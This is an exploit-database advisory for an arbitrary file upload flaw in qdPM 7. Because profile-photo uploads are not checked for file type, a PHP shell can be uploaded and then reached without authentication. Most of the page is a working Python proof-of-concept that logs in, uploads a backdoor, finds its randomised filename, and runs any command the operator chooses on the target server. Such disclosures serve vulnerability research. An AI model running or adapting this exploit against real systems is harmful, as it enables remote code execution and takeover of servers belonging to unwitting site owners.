qdPM 7 Shell Upload

2012.06.15
Credit: loneferret
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

###################################################################################### # Exploit qdPM v.7 Arbitrary File upload # Date: June 13th 2012 # Author: loneferret # Version: 7 # Vendor Url: http://qdpm.net/ # Tested on: Winddows XP / XAMPP ###################################################################################### # Discovered by: loneferret ###################################################################################### # Software description: # Free project management tool for small team # qdPM is a free web-based project management tool suitable for a small team working on multiple projects. # It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact # using a Ticket System that is integrated into Task management. # Vulnerability: # Application does not verify the file's extension when uploading an image for a user's profile. # Making it possible to upload a small php shell, and accessing it remotely. # Note(s): # One needs a valid user account to upload the file. (Client will do) # No need to be authenticated to access the file. # Uploading file: # Once logged in, upload file here: # Page: /qdPM/index.php/home/myAccount # Access file: # File can be found here: # /qdPM/uploads/users/<filename> # # Note the filename will contain a random number. One need to # to look at the source code from the browser to find it. # For example: <input type="file" name="users[photo]" value="171793-backdoor.php" id="users_photo" /> ----- python script ----- #!/usr/bin/python import re, mechanize import urllib, sys print "\n[*] qdPM v.7 Remote Code Execution" print "[*] Vulnerability discovered by loneferret" print "[*] Offensive Security - http://www.offensive-security.com\n" if (len(sys.argv) != 3): print "[*] Usage: poc.py <RHOST> <RCMD>" exit(0) rhost = sys.argv[1] rcmd = sys.argv[2] # Login into site try: print "[*] Loging in ." br = mechanize.Browser() br.open("http://%s/qdPM/index.php/home/login" % rhost) assert br.viewing_html() br.select_form(name="UsersForm") br.select_form(nr=0) br.form['login[email]'] = "loneferret@test.com" br.form['login[password]'] = "123456" print "[*] Hope this works" br.submit() except: print "[*] Oups..." exit(0) # Upload malicious file try: print "[*] Uploading shell .." br.open("http://%s/qdPM/home/myAccount" % rhost) assert br.viewing_html() br.select_form(name="UsersAccountForm") br.select_form(nr=0) br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="users[photo]") br.submit(nr=0) except: print "[-] Upload didn't work." exit(0) # Get file name once saved try: br.select_form(name="UsersAccountForm") for form in br.forms(): filename = form.controls[9].value print "[*] Filename is now: " + filename url = "http://%s/qdPM/uploads/users " % rhost url += "/%s?cmd=%s" % (filename,rcmd) print "[*] Executing command:\n" resp = urllib.urlopen(url) print resp.read() except: print "[-] Oups..." exit(0)

References:

http://qdpm.net/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top